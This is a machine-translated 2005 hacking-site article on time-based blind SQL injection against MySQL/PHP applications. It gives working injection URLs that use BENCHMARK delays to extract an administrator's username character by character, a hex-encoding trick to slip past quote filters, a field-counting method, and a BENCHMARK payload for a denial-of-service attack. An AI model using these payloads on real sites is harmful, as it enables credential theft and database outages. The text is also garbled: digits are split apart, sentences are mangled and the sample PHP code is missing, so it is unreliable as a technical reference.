Recommendation:and MYSQL play the time difference between the injection of game-bug warning-the black bar safety net

2005-11-23T00:00:00
ID MYHACK58:6220054810
Type myhack58
Reporter 佚名
Modified 2005-11-23T00:00:00

Description

Herein the main idea is to through the structure of the statement is added to the execution time delay of the function, if we submit the judgment is correct, then the MYSQL query time on the emergence of delay, if the submitted judgment is correct, will not perform the time delay function, the query will not appear delay, so that we can be judged injection. About the BENCHMARK in the MYSQL Reference Manual where you can see the following description: ------------------------------------------------------------------------------------------- BENCHMARK(count,expr) the BENCHMARK()function repeated countTimes times execution of an expression expr, it can be used for timing the MYSQL process expression much faster. The result value is always 0. the Intended for the MYSQL client, which reports query execution time. MYSQL> select BENCHMARK(1 0 0 0 0 0 0,encode("hello","goodbye")); +----------------------------------------------+ | BENCHMARK(1 0 0 0 0 0 0,encode("hello","goodbye")) | +----------------------------------------------+ | 0 | +----------------------------------------------+ 1 row in set (4.74 sec) reports the time is the client's elapsed time, not inservice Controller of the CPU time. Execute BENCHMARK()several times may be wise, and noteservicethe load multiple to interpret the results. As long as we put the parameter Count is set larger, then the execution time will be longer, below we look at MYSQL execute: MYSQL> select md5( 'test' ); +----------------------------------+ md5( 'test' ) | +----------------------------------+ | 098f6bcd4621d373cade4e832627b4f6| +----------------------------------+ 1 row in set (0.00 sec) 〈-----------the execution time is 0. 0 0 sec MYSQL> select BenchMark( 5 0 0 0 0 0, md5( 'test' ) ); +------------------------------------+ | BenchMark( 5 0 0 0 0 0, md5( 'test' ) ) | +------------------------------------+ | 0 | +------------------------------------+ 1 row in set (6.55 sec) 〈------------the execution time is 6. 5 5 sec it can be seen that the use of BenchMark execution 5 0 0 0 0 0 time is significantly higher than the normal execution time is extended. Combat example first let's look at a simple PHP code: ------------------------------------------------------------------------------ -------------------------------------- ------------------------------------------ Datalibrary Injection structure and content as follows: # datalibrary: the injection # the structure of the table article CREATE TABLE article ( articleid int(1 1) NOT NULL auto_increment, title varchar(1 0 0) NOT NULL default ", content text NOT NULL, PRIMARY KEY (articleid) ) TYPE=MyISAM AUTO_INCREMENT=3 ; # Export the tabledata article INSERT INTO article VALUES (1, 'I is not a love of reading in children', 'laalalalalalalal it! yayayayayayay it!'); INSERT INTO article VALUES (2,' I hate you', 'I hate you, what are you?');

-------------------------------------------------------- # The structure of the table user CREATE TABLE user ( userid int(1 1) NOT NULL auto_increment, username varchar(2 0) NOT NULL default ", password varchar(2 0) NOT NULL default'

', PRIMARY KEY (userid) ) TYPE=MyISAM AUTO_INCREMENT=3 ;

Export the tabledata user INSERT INTO user VALUES (1, 'angel', 'mypass'); INSERT INTO user VALUES (2, '4ngel', 'mypass2');

Code just to query the result of a simple judgment whether there is, assuming we have set Display_errors=Off. We here can't use Union select to replace the direct output of the sensitive information not here say not to use Union, because in MYSQL does not support sub-queries, or by the error message returned is different to determine the injection. We use a Union combined query insert BenchMark function statements to be judged injection: id=1 union select 1,BenchMark(5 0 0 0 0 0,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=9 7 / The above statement can guess the Userid 1 username the first letter of the Ascii code value is whether the 9 7, if it is 9 7, The above query will be due to the BenchMark effect and the delay. If not for the 9 7, will not back the appear delay, so that we eventually can guess the administrator username and password. Script kiddies: everyone note, here's a little trick: in the BenchMark(5 0 0 0 0 0,md5('test'))“'”number, this is very dangerous, because the administrator just set up what you can filter it so that the injection fails, we here Test may be used in other binary representation, such as 1 6-ary, and thus more suitable for General invasion of the environment. The final construct the URL as follows: <http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,BenchMark(5 0 0 0 0 0,md5(0x41)),1%20from%20user%20where%20userid=1%20and%20ord(substring(username,1,1))=9 7%2 0/> execution speed is very slow Get the Userid 1 username the first letter of the Ascii code value of the IS is as 9 to 7. Script kiddies: we use the Union Select when you must know the original statement to query the table number of fields, the past is according to the error message to determine, in“Union select 1,1,1,”where constantly increased by 1, If the number of fields correctly will return to normal without error, and now can not use this method, then we can use BenchMark () to. We thus construct the statement:“Union select BenchMark(5 0 0 0 0 0,md5(0x41)) 1,1”, the Then slowly increase 1. When the number of fields is correct it will go to execute BenchMark (), also there was a delay, so that we can determine the number of fields. In addition to the above comparison of the“Orthodox”use of the method, you can also use the BENCHMARK forDDOSattack. In fact the idea is very simple, in the BENCHMARK(count,expr), we just set the Count performing the number of times large enough, it can cause a DOS attack. In other words, if we use a proxy or other means at the same time submit a request, that isDDOSattack Datathe library will soon hang up, but the premise or a request can be injected to. Statements can be constructed: <http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,BenchMark(9 9 9 9 9 9 9 9,md5(0x41>)) in this article reference is made to some foreign data(<http://www.ngssoftware.com/papers/HackproofingMYSQL.pdf>), in fact on the use of time difference injection method in MSSQL injection in the earlier application, except that the use of the function is different. see<http://www.ngssoftware.com/papers/more_advanced_sql_injection. pdf>it. About MYSQL+PHP General injection such as Union use of, and so on, you can refer to Angel's article on SQL Injection with MYSQL on